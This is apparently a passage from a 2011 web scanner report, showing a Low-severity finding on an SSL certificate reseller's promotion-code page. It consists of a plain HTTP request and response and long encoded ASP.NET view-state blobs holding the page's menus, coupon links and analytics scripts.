MCI+JDAgLSAkNTA8L2E+PC9saT4NCjxsaT48YSBocmVmPSIvc3NsLXByb21vdGlvbi1jb2RlL3NzbC1wcmljZSM1MHRvMTAwIj4kNTAgLSAkMTAwPC9hPjwvbGk+DQo8bGk+PGEgaHJlZj0iL3NzbC1wcm9tb3Rpb24tY29kZS9zc2wtcHJpY2UjMTAwdG8yMDAiPiQxMDAgLSAkMjAwPC9hPjwvbGk+DQo8bGkgY2xhc3M9Imxhc3QiPjxhIGhyZWY9Ii9zc2wtcHJvbW90aW9uLWNvZGUvc3NsLXByaWNlIzIwMCI+JDIwMCAtIE1vcmU8L2E+PC9saT4NCjxsaSBjbGFzcz0idGl0bGUiPlNTTCBieSBUeXBlPC9saT4NCjxsaT48YSBocmVmPSIvc3NsY2VydGlmaWNhdGVzL2RvbWFpbi1zc2wiPkRvbWFpbiBWYWxpZGF0aW9uIFNTTDwvYT48L2xpPg0KPGxpPjxhIGhyZWY9Ii9zc2xjZXJ0aWZpY2F0ZXMvYnVzaW5lc3MtdmFsaWRhdGlvbi1zc2wiPkJ1c2luZXNzIFZhbGlkYXRpb24gU1NMPC9hPjwvbGk+DQo8bGk+PGEgaHJlZj0iL3NzbGNlcnRpZmljYXRlcy93aWxkY2FyZC1jZXJ0aWZpY2F0ZXMiPg0KPGgxPldpbGRjYXJkIFNTTCBDZXJ0aWZpY2F0ZTwvaDE+DQo8L2E+PC9saT4NCjxsaT48YSBocmVmPSIvc3NsY2VydGlmaWNhdGVzL2V2LXNzbC1jZXJ0aWZpY2F0ZXMiPg0KPGgxPkVWIFNTTCBDZXJ0aWZpY2F0ZTwvaDE+DQo8L2E+PC9saT4NCjxsaSBjbGFzcz0ibGFzdCI+PGEgaHJlZj0iL3NzbGNlcnRpZmljYXRlcy9jb2RlLXNpZ25pbmctY2VydGlmaWNhdGUiPg0KPGgxPkNvZGUgU2lnbmluZyBDZXJ0aWZpY2F0ZTwvaDE+DQo8L2E+PC9saT4NCjwvdWw+DQo8L2Rpdj4NCjwvZGl2Pg0KPHAgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsgY2xlYXI6IGJvdGg7Ij4NCjxzY3JpcHQgc3JjPSJodHRwczovL3NtYXJ0aWNvbi5nZW90cnVzdC5jb20vc2kuanMiIHR5cGU9InRleHQvamF2YXNjcmlwdCI+PC9zY3JpcHQ+DQo8L3A+ZAIGD2QWAgIBD2QWAmYPZBYIZg8WAh8BBRRSYXBpZFNTTCBDZXJ0aWZpY2F0ZWQCAQ9kFgJmD2QWAmYPZBYCAgEPFgIeC18hSXRlbUNvdW50AgUWCgIBD2QWBAIBDxYGHgV0aXRsZQUGJDI1LjAwHgV2YWx1ZQUBMR4EbmFtZQUBMWQCAg8VAQExZAICD2QWBAIBDxYGHwMFBiQ0NS4wMB8EBQEyHwUFATJkAgIPFQEBMmQCAw9kFgQCAQ8WBh8DBQYkNjUuMDAfBAUBMx8FBQEzZAICDxUBATNkAgQPZBYEAgEPFgYfAwUGJDg1LjAwHwQFATQfBQUBNGQCAg8VAQE0ZAIFD2QWBAIBDxYGHwMFBiQ5NS4wMB8EBQE1HwUFATVkAgIPFQEBNWQCAw8QDxYCHgdWaXNpYmxlaGRkFgFmZAIEDxYCHwZoFgICAg9kFgICAQ8QZGQWAGQCBw9kFgQCAQ9kFgJmD2QWAmYPZBYCAgEPFgIfAgIFFgxmD2QWAgIBDxYCHwZoZAIBD2QWBGYPFQQAATEFMjUuMDAFMjQuMDBkAgEPFgIfBmgWAmYPFQEEMC4wMGQCAg9kFgRmDxUEBWNvbG9yATIFMjIuNTAFNDEuMDBkAgEPFgIfBmgWAmYPFQEEMC4wMGQCAw9kFgRmDxUEAAEzBTIxLjY3BTU3LjAwZAIBDxYCHwZoFgJmDxUBBDAuMDBkAgQPZBYEZg8VBAVjb2xvcgE0BTIxLjI1BTc0LjAwZAIBDxYCHwZoFgJmDxUBBDAuMDBkAgUPZBYEZg8VBAUgbGFzdAE1BTE5LjAwBjEwMS4wMGQCAQ8WAh8GaBYCZg8VAQQwLjAwZAIDD2QWAmYPZBYCZg9kFgJmDxYCHwEF3gQ8cCBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+PGltZyBzcmM9Ii9pbWFnZXMvMzBkYXlzbW9uZXliYWNrLmpwZyIgYWx0PSIzMCBEYXlzIE1vbmV5IEJhY2siIC8+PC9wPg0KPHA+Jm5ic3A7PC9wPg0KPGRpdiBjbGFzcz0iYmxvY2sgcGxhdGludW1fcGFydG5lciI+DQo8ZGl2IGNsYXNzPSJibG9jay10aXRsZSI+PHNwYW4+U1NMIFJlc2VsbGVyPC9zcGFuPjwvZGl2Pg0KPGRpdiBjbGFzcz0iYmxvY2stY29udGVudCI+PGltZyBzcmM9Ii9pbWFnZXMvcmFwaWRfc3NsLmpwZyIgYWx0PSJSYXBpZFNTTCIgLz48YnIgLz48YnIgLz48aW1nIHNyYz0iL2ltYWdlcy9nZW90cnVzdF9zc2wuanBnIiBhbHQ9Ikdlb1RydXN0IiAvPjxiciAvPjxiciAvPjxpbWcgc3JjPSIvaW1hZ2VzL3RoYXd0ZV9zc2wuanBnIiBhbHQ9IlRoYXd0ZSIgLz48L2Rpdj4NCjwvZGl2Pg0KPGRpdiBjbGFzcz0iYmxvY2sgcGF5cGFsIj4NCjxkaXYgY2xhc3M9ImJsb2NrLXRpdGxlIj48c3Bhbj5XZSBBY2NlcHQ8L3NwYW4+PC9kaXY+DQo8ZGl2IGNsYXNzPSJibG9jay1jb250ZW50Ij48aW1nIHNyYz0iL2ltYWdlcy9wYXlwYWwuanBnIiBhbHQ9IlBheVBhbCBTU0wiIC8+PC9kaXY+DQo8L2Rpdj5kAgkPZBYCZg9kFgJmD2QWAgIBDxYCHwEF8wY8ZGl2IGNsYXNzPSJmb290ZXJfdG9wIj4NCjxkaXYgY2xhc3M9ImJyb3dzZXJzIj48aW1nIHNyYz0iL2ltYWdlcy9icm93c2Vycy5qcGciIGFsdD0iIiAvPjwvZGl2Pg0KPGRpdiBjbGFzcz0icHVyY2hhc2UiPjxpbWcgc3JjPSIvaW1hZ2VzL3B1cmNoYXNlLXdvcmtzLmpwZyIgYWx0PSJCdXkgQ2hlYXAgU1NMIENlcnRpZmljYXRlcyIgLz48L2Rpdj4NCjx1bD4NCjxoMj5XaHkgU1NMTWF0cml4LmNvbT88L2gyPg0KPGxpPjMwIERheSAxMDAlIG1vbmV5IGJhY2sgZ3VhcmFudGVlPC9saT4NCjxsaT5FYXN5IGFuZCBzZWN1cmUgU1NMIG9yZGVyIHByb2Nlc3M8L2xpPg0KPGxpPkluc3RhbnQgU1NMIGlzc3VhbmNlIC0gMjQvNy8zNjU8L2xpPg0KPGxpPkxpZmUgc3BhbiBmcmVlIFNTTCByZWlzc3VlIGluc3VyYW5jZTwvbGk+DQo8bGk+V29ybGQgd2lkZSBhdXRob3JpemVkIFNTTCByZXNlbGxlcjwvbGk+DQo8bGk+RnJlZSBTU0wgc2l0ZSBzZWFsIG9uIFNTTCBwdXJjaGFzZTwvbGk+DQo8L3VsPg0KPC9kaXY+DQo8ZGl2IGNsYXNzPSJmb290ZXJfYm90dG9tIj4NCjxkaXYgY2xhc3M9ImZvb3Rlcl9ib3R0b21fbGVmdCI+PGEgaHJlZj0iLyI+SG9tZTwvYT4gfCA8YSBocmVmPSIvc3NsLWJyYW5kcyI+U1NMIEJyYW5kczwvYT4gfCA8YSBocmVmPSIvc3NsY2VydGlmaWNhdGVzIj5TU0wgQ2VydGlmaWNhdGVzPC9hPiB8IDxhIGhyZWY9Ii9zc2wtcHJvbW90aW9uLWNvZGUiPlNTTCBQcm9tb3Rpb248L2E+IHwgPGEgaHJlZj0iL1NTTFRvb2xzIj5TU0wgVG9vbHM8L2E+IHwgPGEgaHJlZj0iL2NvbnRhY3R1cyI+Q29udGFjdCBVczwvYT4gfCA8YSBocmVmPSIvU1NMVG9vbHMvd2hhdC1pcy1zc2wtY2VydGlmaWNhdGUiPlNTTCBGQVFzPC9hPjwvZGl2Pg0KPC9kaXY+ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WDQVgY3RsMDAkY3RsMDAkY3BoTWFpbiRDb250ZW50UGxhY2VIb2xkZXIxJGN0bDAwJHVjT3JkZXJQcmljaW5nJGN0bDAwJHJwdFllYXJTZWxlY3QkY3RsMDEkcmRvU2VsZWN0BWBjdGwwMCRjdGwwMCRjcGhNYWluJENvbnRlbnRQbGFjZUhvbGRlcjEkY3RsMDAkdWNPcmRlclByaWNpbmckY3RsMDAkcnB0WWVhclNlbGVjdCRjdGwwMiRyZG9TZWxlY3QFYGN0bDAwJGN0bDAwJGNwaE1haW4kQ29udGVudFBsYWNlSG9sZGVyMSRjdGwwMCR1Y09yZGVyUHJpY2luZyRjdGwwMCRycHRZZWFyU2VsZWN0JGN0bDAzJHJkb1NlbGVjdAVgY3RsMDAkY3RsMDAkY3BoTWFpbiRDb250ZW50UGxhY2VIb2xkZXIxJGN0bDAwJHVjT3JkZXJQcmljaW5nJGN0bDAwJHJwdFllYXJTZWxlY3QkY3RsMDQkcmRvU2VsZWN0BWBjdGwwMCRjdGwwMCRjcGhNYWluJENvbnRlbnRQbGFjZUhvbGRlcjEkY3RsMDAkdWNPcmRlclByaWNpbmckY3RsMDAkcnB0WWVhclNlbGVjdCRjdGwwNSRyZG9TZWxlY3QFM2N0bDAwJGN0bDAwJGNwaE1haW4kQ29udGVudFBsYWNlSG9sZGVyMSRjdGwwMCRyZE5ldwU1Y3RsMDAkY3RsMDAkY3BoTWFpbiRDb250ZW50UGxhY2VIb2xkZXIxJGN0bDAwJHJkUmVuZXcFNWN0bDAwJGN0bDAwJGNwaE1haW4kQ29udGVudFBsYWNlSG9sZGVyMSRjdGwwMCRyZFJlbmV3BTljdGwwMCRjdGwwMCRjcGhNYWluJENvbnRlbnRQbGFjZUhvbGRlcjEkY3RsMDAkcmRVc2VyTG9naW4FNmN0bDAwJGN0bDAwJGNwaE1haW4kQ29udGVudFBsYWNlSG9sZGVyMSRjdGwwMCRyZFBheU5vdwU2Y3RsMDAkY3RsMDAkY3BoTWFpbiRDb250ZW50UGxhY2VIb2xkZXIxJGN0bDAwJHJkUGF5Tm93BTZjdGwwMCRjdGwwMCRjcGhNYWluJENvbnRlbnRQbGFjZUhvbGRlcjEkY3RsMDAkcmRTaWduVXAFNmN0bDAwJGN0bDAwJGNwaE1haW4kQ29udGVudFBsYWNlSG9sZGVyMSRjdGwwMCRyZFNpZ25VcA==" />
...[SNIP]...

9.2. https://www.sslmatrix.com/ssl-promotion-code  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sslmatrix.com
Path:   /ssl-promotion-code

Request

GET /ssl-promotion-code HTTP/1.1
Host: www.sslmatrix.com
Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ssl+certificates#q=ssl+certificates&hl=en&prmd=ivnsufd&source=lnms&tbm=shop&ei=_5tiTr_COO_SiAKums2VCg&sa=X&oi=mode_link&ct=mode&cd=5&ved=0CFYQ_AUoBA&bav=on.2,or.r_gc.r_pw.&fp=d8e70e66cd7c7a51&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:44:08 GMT
Content-Length: 37574


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1">
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUINTExODkxNDUPZBYCZg9kFgJmD2QWBAIBD2QWAmYPZBYEZg8WAh4EVGV4dAWCAzxtZXRhIG5hbWU9IktleXdvcmRzIiBjb250ZW50PSJUaGF3dGUgUHJvbW90aW9uYWwgQ29kZSwgVGhhd3RlIFByb21vIGNvZGUsIFJhcGlkU1NMIFByb21vdGlvbmFsIENvZGUsIFJhcGlkU1NMIFByb21vIENvZGUsIEdlb1RydXN0IFByb21vdGlvbmFsIENvZGUsIEdlb1RydXN0IFByb21vIENvZGUsIFJhcGlkU1NMIENlcnRpZmljYXRlIFByb21vdGlvbmFsIENvZGUsIFRoYXd0ZSBQcm9tb3Rpb25hbCBDb2RlLCBXaWxkY2FyZCBTU0wgUHJvbW90aW9uYWwgQ29kZSwgRVYgU1NMIFByb21vdGlvbmFsIENvZGUsIFF1aWNrU1NMIFByb21vdGlvbmFsIENvZGUsIFNTTCBXZWJTZXJ2ZXIgUHJvbW90aW9uYWwgQ29kZSwgUXVpY2tTU0wgUHJlbWl1bSBQcm9tb3Rpb25hbCBDb2RlIi8+ZAIBDxYCHwAFqwI8bWV0YSBuYW1lPSJEZXNjcmlwdGlvbiIgY29udGVudD0iUHJvbW90aW9uYWwgY29kZSBmb3IgUHJvbW90aW9uYWwgQ29kZSBmb3IgVGhhd3RlIFJhcGlkU1NMIEdlb1RydXN0LiBTU0wgQ291cG9uIENvZGVzIGZvciBUaGF3dGUgU1NMMTIzLCBTU0wgV2ViU2VydmVyLCBSYXBpZFNTTCBDZXJ0aWZpY2F0ZSwgV2lsZGNhcmQgU1NMLCBFViBTU0wsIFF1aWNrU1NMIFByZW1pdW0uIFByb21vdGlvbmFsIENvZGVzIGFuZCBidXkgQ2hlYXAgU1NMIENlcnRpZmljYXRlcyBmcm9tIFRoYXd0ZSwgUmFwaWRTU0wsIEdlb1RydXN0LiIvPmQCAw8WAh4GYWN0aW9uBRMvc3NsLXByb21vdGlvbi1jb2RlFgICAQ9kFgoCAQ9kFgJmD2QWAmYPZBYCAgEPFgIfAAX4DzxwIGNsYXNzPSJsb2dvX3BhZGRpbmciPjxhIGhyZWY9Ii8iPjxpbWcgc3JjPSIvaW1hZ2VzL2xvZ28ucG5nIiBib3JkZXI9IjAiIGFsdD0iQ2hlYXAgU1NMIiAvPjwvYT48L3A+DQo8ZGl2IGNsYXNzPSJ0b3BfdGV4dCI+R2xvYmFsIFN1cHBsaWVyIE9mIFRydXN0ZWQgU1NMIENlcnRpZmljYXRlcyAmYW1wOyBTaXRlIFNlYWwuPC9kaXY+DQo8IS0tIEJFR0lOIExpdmVQZXJzb24gTW9uaXRvci4gLS0+DQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+Ly8gPCFbQ0RBVEFbDQogICAgICAgIHZhciBscE1UYWdDb25maWcgPSB7ICdscFNlcnZlcic6ICJzZXJ2ZXIuaWFkLmxpdmVwZXJzb24ubmV0IiwgJ2xwTnVtYmVyJzogIjU3OTM3ODAzIiwgJ2xwUHJvdG9jb2wnOiAiaHR0cHMiIH07DQogICAgICAgIGZ1bmN0aW9uIGxwQWRkTW9uaXRvclRhZyhzcmMpIHsNCiAgICAgICAgICAgIGlmICh0eXBlb2YgKHNyYykgPT0gJ3VuZGVmaW5lZCcgfHwgdHlwZW9mIChzcmMpID09ICdvYmplY3QnKSB7DQogICAgICAgICAgICAgICAgc3JjID0gbHBNVGFnQ29uZmlnLmxwTVRhZ1NyYyA/IGxwTVRhZ0NvbmZpZy5scE1UYWdTcmMgOiAnL2hjcC9odG1sL21UYWcuanMnOw0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgaWYgKHNyYy5pbmRleE9mKCdodHRwJykgIT0gMCkgew0KICAgICAgICAgICAgICAgIHNyYyA9IGxwTVRhZ0NvbmZpZy5scFByb3RvY29sICsgIjovLyIgKyBscE1UYWdDb25maWcubHBTZXJ2ZXIgKyBzcmMgKyAnP3NpdGU9JyArIGxwTVRhZ0NvbmZpZy5scE51bWJlcjsNCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIGVsc2Ugew0KICAgICAgICAgICAgICAgIGlmIChzcmMuaW5kZXhPZignc2l0ZT0nKSA8IDApIHsNCiAgICAgICAgICAgICAgICAgICAgaWYgKHNyYy5pbmRleE9mKCc/JykgPCAwKSBzcmMgPSBzcmMgKyAnPyc7IGVsc2Ugc3JjID0gc3JjICsgJyYnOyBzcmMgPSBzcmMgKyAnc2l0ZT0nICsgbHBNVGFnQ29uZmlnLmxwTnVtYmVyOw0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH07IHZhciBzID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7IHMuc2V0QXR0cmlidXRlKCd0eXBlJywgJ3RleHQvamF2YXNjcmlwdCcpOyBzLnNldEF0dHJpYnV0ZSgnY2hhcnNldCcsICdpc28tODg1OS0xJyk7IHMuc2V0QXR0cmlidXRlKCdzcmMnLCBzcmMpOyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaGVhZCcpLml0ZW0oMCkuYXBwZW5kQ2hpbGQocyk7DQogICAgICAgIH0gaWYgKHdpbmRvdy5hdHRhY2hFdmVudCkgd2luZG93LmF0dGFjaEV2ZW50KCdvbmxvYWQnLCBscEFkZE1vbml0b3JUYWcpOyBlbHNlIHdpbmRvdy5hZGRFdmVudExpc3RlbmVyKCJsb2FkIiwgbHBBZGRNb25pdG9yVGFnLCBmYWxzZSk7DQovLyBdXT48L3NjcmlwdD4NCjwhLS0gRU5EIExpdmVQZXJzb24gTW9uaXRvci4gLS0+IDwhLS0gTGl2ZSBDaGF0IENvZGUgRW5kcyBIZXJlICAtLT4gPCEtLSBFTkQgTGl2ZVBlcnNvbiBNb25pdG9yLiAtLT4gPCEtLSBHb29nbGUgQW5hbHl0aWNzIENvZGUgU3RhcnQgLS0+DQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+Ly8gPCFbQ0RBVEFbDQp2YXIgZ2FKc0hvc3QgPSAoKCJodHRwczoiID09IGRvY3VtZW50LmxvY2F0aW9uLnByb3RvY29sKSA/ICJodHRwczovL3NzbC4iIDogImh0dHA6Ly93d3cuIik7DQpkb2N1bWVudC53cml0ZSh1bmVzY2FwZSgiJTNDc2NyaXB0IHNyYz0nIiArIGdhSnNIb3N0ICsgImdvb2dsZS1hbmFseXRpY3MuY29tL2dhLmpzJyB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnJTNFJTNDL3NjcmlwdCUzRSIpKTsNCi8vIF1dPjwvc2NyaXB0Pg0KPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPi8vIDwhW0NEQVRBWw0KdHJ5IHsNCnZhciBwYWdlVHJhY2tlciA9IF9nYXQuX2dldFRyYWNrZXIoIlVBLTExODU0MTEwLTQiKTsNCnBhZ2VUcmFja2VyLl90cmFja1BhZ2V2aWV3KCk7DQp9IGNhdGNoKGVycikge30NCi8vIF1dPjwvc2NyaXB0Pg0KPCEtLSBHb29nbGUgQW5hbHl0aWNzIENvZGUgRW5kIC0tPmQCBQ9kFgICAQ9kFgJmD2QWAmYPZBYCZg8WAh8ABcYKPGRpdiBjbGFzcz0iYmxvY2sgc3NsLWJ5LWJyYW5kIj4NCjxkaXYgY2xhc3M9ImJsb2NrLXRpdGxlIj48c3Bhbj5TU0wgYnkgQnJhbmQ8L3NwYW4+PC9kaXY+DQo8ZGl2IGNsYXNzPSJibG9jay1jb250ZW50Ij4NCjx1bD4NCjxsaT48YSBocmVmPSIvc3NsLWJyYW5kcy9yYXBpZHNzbCI+DQo8aDE+UmFwaWRTU0w8L2gxPg0KPC9hPjwvbGk+DQo8bGk+PGEgaHJlZj0iL3NzbC1icmFuZHMvZ2VvdHJ1c3Qtc3NsIj4NCjxoMT5HZW9UcnVzdDwvaDE+DQo8L2E+PC9saT4NCjxsaSBjbGFzcz0ibGFzdCI+PGEgaHJlZj0iL3NzbC1icmFuZHMvdGhhd3RlLXNzbCI+DQo8aDE+VGhhd3RlPC9oMT4NCjwvYT48L2xpPg0KPGxpIGNsYXNzPSJ0aXRsZSI+U1NMIGJ5IFByaWNlPC9saT4NCjxsaT48YSBocmVmPSIvc3NsLXByb21vdGlvbi1jb2RlL3NzbC1wcmljZSMwdG81MCI+JDAgLSAkNTA8L2E+PC9saT4NCjxsaT48YSBocmVmPSIvc3NsLXByb21vdGlvbi1jb2RlL3NzbC1wcmljZSM1MHRvMTAwIj4kNTAgLSAkMTAwPC9hPjwvbGk+DQo8bGk+PGEgaHJlZj0iL3NzbC1wcm9tb3Rpb24tY29kZS9zc2wtcHJpY2UjMTAwdG8yMDAiPiQxMDAgLSAkMjAwPC9hPjwvbGk+DQo8bGkgY2xhc3M9Imxhc3QiPjxhIGhyZWY9Ii9zc2wtcHJvbW90aW9uLWNvZGUvc3NsLXByaWNlIzIwMCI+JDIwMCAtIE1vcmU8L2E+PC9saT4NCjxsaSBjbGFzcz0idGl0bGUiPlNTTCBieSBUeXBlPC9saT4NCjxsaT48YSBocmVmPSIvc3NsY2VydGlmaWNhdGVzL2RvbWFpbi1zc2wiPkRvbWFpbiBWYWxpZGF0aW9uIFNTTDwvYT48L2xpPg0KPGxpPjxhIGhyZWY9Ii9zc2xjZXJ0aWZpY2F0ZXMvYnVzaW5lc3MtdmFsaWRhdGlvbi1zc2wiPkJ1c2luZXNzIFZhbGlkYXRpb24gU1NMPC9hPjwvbGk+DQo8bGk+PGEgaHJlZj0iL3NzbGNlcnRpZmljYXRlcy93aWxkY2FyZC1jZXJ0aWZpY2F0ZXMiPg0KPGgxPldpbGRjYXJkIFNTTCBDZXJ0aWZpY2F0ZTwvaDE+DQo8L2E+PC9saT4NCjxsaT48YSBocmVmPSIvc3NsY2VydGlmaWNhdGVzL2V2LXNzbC1jZXJ0aWZpY2F0ZXMiPg0KPGgxPkVWIFNTTCBDZXJ0aWZpY2F0ZTwvaDE+DQo8L2E+PC9saT4NCjxsaSBjbGFzcz0ibGFzdCI+PGEgaHJlZj0iL3NzbGNlcnRpZmljYXRlcy9jb2RlLXNpZ25pbmctY2VydGlmaWNhdGUiPg0KPGgxPkNvZGUgU2lnbmluZyBDZXJ0aWZpY2F0ZTwvaDE+DQo8L2E+PC9saT4NCjwvdWw+DQo8L2Rpdj4NCjwvZGl2Pg0KPHAgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsgY2xlYXI6IGJvdGg7Ij4NCjxzY3JpcHQgc3JjPSJodHRwczovL3NtYXJ0aWNvbi5nZW90cnVzdC5jb20vc2kuanMiIHR5cGU9InRleHQvamF2YXNjcmlwdCI+PC9zY3JpcHQ+DQo8L3A+ZAIGD2QWAmYPZBYCZg9kFgJmDxYCHwAF3Q88aDE+DQo8cCBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+PHNwYW4gc3R5bGU9ImZvbnQtc2l6ZTogbGFyZ2U7Ij48c3Ryb25nPlNTTCBDZXJ0aWZpY2F0ZSBTcGVjaWFsIERpc2NvdW50IE9mZmVyPC9zdHJvbmc+PC9zcGFuPjwvcD4NCjwvaDE+DQo8cCBzdHlsZT0idGV4dC1hbGlnbjogbGVmdDsiPiZuYnNwOzwvcD4NCjxwIHN0eWxlPSJ0ZXh0LWFsaWduOiBsZWZ0OyI+PHN0cm9uZz48c3BhbiBzdHlsZT0iZm9udC1zaXplOiBsYXJnZTsiPjxzcGFuIHN0eWxlPSJmb250LXNpemU6IHNtYWxsOyI+SG93IGRvIEkgZ2V0IGRpc2NvdW50IHByaWNlPzwvc3Bhbj48L3NwYW4+PC9zdHJvbmc+PC9wPg0KPHAgc3R5bGU9InRleHQtYWxpZ246IGxlZnQ7Ij4mbmJzcDs8L3A+DQo8cD5TU0xNYXRyaXggb2ZmZXIgdGhlIHNwZWNpYWwgZGlzY291bnQgcHJpY2Ugb24gUmFwaWRTU0wsIEdlb3RydXN0IGFuZCBUaGF3dGUgU1NMIGNlcnRpZmljYXRlcy4gQWxsIHRoZSBiZWxvdyBkaXNjb3VudCBvZmZlcnMgY29udGFpbnMgc3BlY2lhbCBESVNDT1VOVCBDT1VQT04gQ09ERS4gPHNwYW4gc3R5bGU9ImNvbG9yOiAjZmYwMDAwOyBiYWNrZ3JvdW5kLWNvbG9yOiAjZmZjYzk5OyI+WW91IHdvdWxkIGJlIGFzayB0byBwcm92aWRlIGNvdXBvbiBjb2RlIGF0IHRpbWUgb2YgU1NMIHB1cmNoYXNlIG9yIHBheW1lbnQgY29uZmlybWF0aW9uLjwvc3Bhbj4gU1NMIGRpc2NvdW50IG9mZmVycyBhcmUgZm9yIGxpbWl0ZWQgdGltZSBwZXJpb2Qgb25seS48L3A+DQo8cD4mbmJzcDs8L3A+DQo8dGFibGUgYm9yZGVyPSIwIiBjZWxsc3BhY2luZz0iOCIgY2VsbHBhZGRpbmc9IjIiPg0KPHRib2R5Pg0KPHRyPg0KPHRkPjxhIHRpdGxlPSJSYXBpZFNTTCBhdCAkOSBvbmx5IiBocmVmPSIvT3JkZXIvcXVpY2tvcmRlcj9waWQ9MSZhbXA7eXI9NSZhbXA7b3Q9bmV3JmFtcDtjYz1zbXIwOSI+PGltZyBzcmM9Ii9pbWFnZXMvcmFwaWRzc2wtY2VydGlmaWNhdGUuanBnIiBhbHQ9IlJhcGlkU1NMICQ5IiAvPjwvYT48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48YSB0aXRsZT0iV2lsZGNhcmQgU1NMICQ5OSIgaHJlZj0iL09yZGVyL3F1aWNrb3JkZXI/cGlkPTImYW1wO3lyPTImYW1wO290PW5ldyZhbXA7Y2M9c21yOTkiPjxpbWcgc3JjPSIvaW1hZ2VzL3dpbGRjYXJkLWNlcnRpZmljYXRlLmpwZyIgYWx0PSJXaWxkY2FyZCBTU0wgQ2VydGlmaWNhdGUgJDk5IiAvPjwvYT48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48YSB0aXRsZT0iR2VvdHJ1c3QgUXVpY2tTU0wgUHJlbWl1bSAkNDkiIGhyZWY9Ii9PcmRlci9xdWlja29yZGVyP3BpZD01JmFtcDt5cj0yJmFtcDtvdD1uZXcmYW1wO2NjPXNtZzQ5Ij48aW1nIHNyYz0iL2ltYWdlcy9xdWNpa3NzbC1wcmVtaXVtLmpwZyIgYWx0PSJHZW90cnVzdCBRdWNpa1NTTCAkNDkiIC8+PC9hPjwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxhIHRpdGxlPSJHZW90cnVzdCBFViBTU0wgJDEyMCIgaHJlZj0iL09yZGVyL3F1aWNrb3JkZXI/cGlkPTgmYW1wO3lyPTImYW1wO290PW5ldyZhbXA7Y2M9c21nMTIwIj48aW1nIHNyYz0iL2ltYWdlcy9ldi1zc2wtY2VydGlmaWNhdGUuanBnIiBhbHQ9IkNoZWFwIEVWIFNTTCAkMTIwIiAvPjwvYT48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48YSB0aXRsZT0iVGhhd3RlIFNTTDEyMyAkMzkiIGhyZWY9Ii9PcmRlci9xdWlja29yZGVyP3BpZD0xMiZhbXA7eXI9MiZhbXA7b3Q9bmV3JmFtcDtjYz1zbXQzOSI+PGltZyBzcmM9Ii9pbWFnZXMvc3NsLTEyMy5qcGciIGFsdD0iVGhhd3RlIFNTTDEyMyAkMzkiIC8+PC9hPjwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxhIHRpdGxlPSJUaGF3dGUgV2ViU2VydmVyIFNTTCAkODkiIGhyZWY9Ii9PcmRlci9xdWlja29yZGVyP3BpZD0xMSZhbXA7eXI9MSZhbXA7b3Q9bmV3JmFtcDtjYz1zbXQ4OSI+PGltZyBzcmM9Ii9pbWFnZXMvc3NsLXdlYi1zZXJ2ZXIuanBnIiBhbHQ9IldlYiBTZXJ2ZXIgU1NMICQ4OSIgLz48L2E+PC90ZD4NCjwvdHI+DQo8L3Rib2R5Pg0KPC90YWJsZT5kAgcPZBYCAgEPZBYCZg9kFgJmD2QWAmYPZBYCZg8WAh8ABd4EPHAgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsiPjxpbWcgc3JjPSIvaW1hZ2VzLzMwZGF5c21vbmV5YmFjay5qcGciIGFsdD0iMzAgRGF5cyBNb25leSBCYWNrIiAvPjwvcD4NCjxwPiZuYnNwOzwvcD4NCjxkaXYgY2xhc3M9ImJsb2NrIHBsYXRpbnVtX3BhcnRuZXIiPg0KPGRpdiBjbGFzcz0iYmxvY2stdGl0bGUiPjxzcGFuPlNTTCBSZXNlbGxlcjwvc3Bhbj48L2Rpdj4NCjxkaXYgY2xhc3M9ImJsb2NrLWNvbnRlbnQiPjxpbWcgc3JjPSIvaW1hZ2VzL3JhcGlkX3NzbC5qcGciIGFsdD0iUmFwaWRTU0wiIC8+PGJyIC8+PGJyIC8+PGltZyBzcmM9Ii9pbWFnZXMvZ2VvdHJ1c3Rfc3NsLmpwZyIgYWx0PSJHZW9UcnVzdCIgLz48YnIgLz48YnIgLz48aW1nIHNyYz0iL2ltYWdlcy90aGF3dGVfc3NsLmpwZyIgYWx0PSJUaGF3dGUiIC8+PC9kaXY+DQo8L2Rpdj4NCjxkaXYgY2xhc3M9ImJsb2NrIHBheXBhbCI+DQo8ZGl2IGNsYXNzPSJibG9jay10aXRsZSI+PHNwYW4+V2UgQWNjZXB0PC9zcGFuPjwvZGl2Pg0KPGRpdiBjbGFzcz0